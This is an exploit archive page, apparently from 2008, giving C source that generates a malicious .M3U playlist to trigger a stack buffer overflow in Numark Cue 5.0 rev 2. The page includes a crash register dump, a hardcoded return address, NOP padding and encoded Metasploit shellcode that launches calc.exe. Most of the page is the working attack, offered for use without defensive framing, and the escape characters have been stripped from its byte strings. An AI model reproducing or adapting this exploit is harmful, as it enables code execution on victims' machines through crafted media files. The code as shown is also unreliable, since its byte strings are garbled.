Numark Cue 5.0 rev 2 Local .M3U File Stack Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Numark Cue 5.0 rev 2 Local .M3U File Stack Buffer Overflow Exploit
# Published : 2008-09-06
# Author : fl0 fl0w
# Previous Title : MS Windows 2003 Token Kidnapping Local Exploit PoC
# Next Title : Postfix <= 2.6-20080814 (symlink) Local Privilege Escalation Exploit
/*Numark Cue 5.0 rev 2 Local .M3U File Stack Buffer Overflow
 This sploit Launches calc.exe .. classical buffer overflow ,a 500 byte buffer is causing the exeption.
 Tested on WinXP Pro sp3,compiled with DEv-C++ 4.9.9.2.
 
 After preparation:
 |Access violation when executing [58414158]|  
EAX 00000001
ECX 004C01B2 cue_tria.004C01B2
EDX 01030608
EBX 0309948D ASCII "I:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESP 0013EC98 ASCII "eeeeeeeeeeeeeeeeeeeeeeeeeeeYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYr Of The Dog Again (2006)[T-Boyz]13. DMX - Life be my Song.mp3.jpg"
EBP 00000000
ESI 016016E0
EDI 00000000
EIP 58414158
Geetz to my friends Gil-Dong,Marsu,Expanders,Str0ke,Razvan,Vlad and all the people that I 
 know...find me in Regie.
*/

#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<windows.h>

#define OFFSET 549

//got this shellcode from metasploit
  char shellcode[]=
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x51x5ax37x6ax63"
"x58x30x42x30x50x42x6bx42x41x73x41x42x32x42x41x32"
"x41x41x30x41x41x58x38x42x42x50x75x38x69x69x6cx38"
"x68x41x54x77x70x57x70x75x50x6ex6bx41x55x55x6cx6e"
"x6bx43x4cx66x65x41x68x45x51x58x6fx4cx4bx50x4fx62"
"x38x6ex6bx41x4fx31x30x36x61x4ax4bx41x59x6cx4bx74"
"x74x6ex6bx44x41x4ax4ex47x41x4bx70x6fx69x6cx6cx4c"
"x44x4bx70x43x44x76x67x4bx71x4ax6ax66x6dx66x61x39"
"x52x5ax4bx4ax54x75x6bx62x74x56x44x73x34x41x65x4b"
"x55x4ex6bx73x6fx54x64x53x31x6ax4bx35x36x6cx4bx64"
"x4cx30x4bx6cx4bx73x6fx57x6cx75x51x6ax4bx6cx4bx37"
"x6cx6cx4bx77x71x68x6bx4cx49x71x4cx51x34x43x34x6b"
"x73x46x51x79x50x71x74x4cx4bx67x30x36x50x4cx45x4b"
"x70x62x58x74x4cx6cx4bx53x70x56x6cx4ex6bx34x30x47"
"x6cx4ex4dx6cx4bx70x68x37x78x58x6bx53x39x6cx4bx4f"
"x70x6cx70x53x30x43x30x73x30x6cx4bx42x48x77x4cx61"
"x4fx44x71x6bx46x73x50x72x76x6bx39x5ax58x6fx73x4f"
"x30x73x4bx56x30x31x78x61x6ex6ax78x4bx52x74x33x55"
"x38x4ax38x69x6ex6cx4ax54x4ex52x77x79x6fx79x77x42"
"x43x50x61x70x6cx41x73x64x6ex51x75x52x58x31x75x57"
"x70x63";


  char file_start[]=
"x23x56x69x72x74x75x61x6Cx44x4A"
"x20x50x6Cx61x79x6Cx69x73x74x0D"
"x0Ax23x4Dx69x78x54x79x70x65x3D"
"x53x6Dx61x72x74x0Dx0Ax49x3Ax5C";


  char file_end[]=
"x72x20x4Fx66x20x54x68x65x20x44"
"x6Fx67x20x41x67x61x69x6Ex20x28"
"x32x30x30x36x29x5Bx54x2Dx42x6F"
"x79x7Ax5Dx5Cx31x33x2Ex20x44x4D"
"x58x20x2Dx20x4Cx69x66x65x20x62"
"x65x20x6Dx79x20x53x6Fx6Ex67x2E"
"x6Dx70x33x0Dx0Ax00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00"
"x00";

 int main(int argc, char *argv[])
 { FILE *y;
   unsigned char *buffer;
   unsigned int offset=0;
   unsigned int NEW_EIP=0x7C8369F0;
   
    if(argc<2) 
   {   
    printf("****************************************n");
    printf("USAGE IS:");
             printf("FileName.m3un");  
    printf("Credits for finding the bug and sploit go to fl0 fl0w n");
    printf("****************************************n");    
    system("color 02");
    Sleep(2000); 
return 0;   
   }  
   
   if((y=fopen(argv[1],"wb"))==NULL)
   { printf("error"); 
     exit(0); 
   } 
   
   printf("************************************************************n");
   printf("Numark Cue 5.0 rev 2 .M3U File Stack Buffer Overflown");
   printf("Credits for finding the bug and sploit go to fl0 fl0w n");
   printf("File successfully buit,open with Numark Cue :)n");
   printf("************************************************************n"); 
   system("color 03");
   
   buffer=(unsigned char *)malloc(OFFSET+strlen(file_start)+strlen(file_end)+4+1+strlen(shellcode)+15);
   memset(buffer,0x90,OFFSET+strlen(file_start)+strlen(file_end)+4+1+strlen(shellcode)+15);
   memcpy(buffer,file_start,strlen(file_start));  offset=OFFSET;  
   memcpy(buffer+offset,&NEW_EIP,4);  offset+=4;
   offset+=15;
   memcpy(buffer+offset,shellcode,strlen(shellcode)); offset+=strlen(shellcode);
   memcpy(buffer+offset,file_end,strlen(file_end)); offset+=strlen(file_end);
   fprintf(y,"%s",buffer);
   
return 0;  
      }

// www.Syue.com [2008-09-06]